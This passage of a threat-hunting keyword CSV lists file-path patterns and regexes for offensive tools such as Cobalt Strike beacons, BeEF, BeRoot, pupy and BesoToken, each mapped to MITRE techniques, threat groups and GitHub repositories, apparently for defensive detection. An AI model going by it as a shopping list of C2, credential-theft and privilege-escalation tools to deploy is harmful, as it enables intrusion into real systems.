tool","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z","5577" "*/beacon_202_no_acl.log*",".{0,1000}\/beacon_202_no_acl\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","#logfile #linux","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5578" "*/beacon_257-objects.log*",".{0,1000}\/beacon_257\-objects\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","#linux","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5579" "*/beacon_compatibility*",".{0,1000}\/beacon_compatibility.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","5580" "*/beacon_compatibility.*",".{0,1000}\/beacon_compatibility\..{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","5581" "*/beacon_funcs/*",".{0,1000}\/beacon_funcs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","5582" "*/beacon_generate.py*",".{0,1000}\/beacon_generate\.py.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","5583" "*/beacon_health_check/*",".{0,1000}\/beacon_health_check\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","N/A","10","10","142","21","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z","5584" "*/beacon_http/*",".{0,1000}\/beacon_http\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5585" "*/beacon_notify.cna*",".{0,1000}\/beacon_notify\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","5586" "*/BeaconChannel.cs*",".{0,1000}\/BeaconChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","5587" "*/beaconhealth.cna*",".{0,1000}\/beaconhealth\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","N/A","10","10","142","21","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z","5588" "*/beacon-injection/*",".{0,1000}\/beacon\-injection\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","N/A","10","10","151","23","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z","5589" 
"*/beacon-object-file*",".{0,1000}\/beacon\-object\-file.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/realoriginal/beacon-object-file","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5590" "*/BeaconTool.java*",".{0,1000}\/BeaconTool\.java.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","5591" "*/beef.git*",".{0,1000}\/beef\.git.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5592" "*/beef/extensions/*.rb*",".{0,1000}\/beef\/extensions\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5593" "*/beef_bind_shell/*",".{0,1000}\/beef_bind_shell\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5594" "*/beef_common.js*",".{0,1000}\/beef_common\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5595" "*/beefbind/*",".{0,1000}\/beefbind\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5596" "*/beefproject/*",".{0,1000}\/beefproject\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5597" "*/Ben0xA/*",".{0,1000}\/Ben0xA\/.{0,1000}","offensive_tool_keyword","Github Username","Github username of known powershell offensive modules and scripts","T1059 - T1027 - T1064 - T1086 - T1191 - T1202","TA0002 - TA0003 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Ben0xA","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5598" "*/beRoot.exe*",".{0,1000}\/beRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5599" "*/BeRoot.git*",".{0,1000}\/BeRoot\.git.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5600" "*/beRoot.py*",".{0,1000}\/beRoot\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5601" "*/beroot.py*",".{0,1000}\/beroot\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework 
written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","5602" "*/beRoot.zip*",".{0,1000}\/beRoot\.zip.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5603" "*/BeRoot/Linux/*",".{0,1000}\/BeRoot\/Linux\/.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5604" "*/beroot/modules/*.py*",".{0,1000}\/beroot\/modules\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5605" 
"*/BesoToken.cpp*",".{0,1000}\/BesoToken\.cpp.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","5606" "*/BesoToken.exe*",".{0,1000}\/BesoToken\.exe.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","5607" "*/BesoToken.git*",".{0,1000}\/BesoToken\.git.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","5608" "*/bettercap*",".{0,1000}\/bettercap.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","5609" 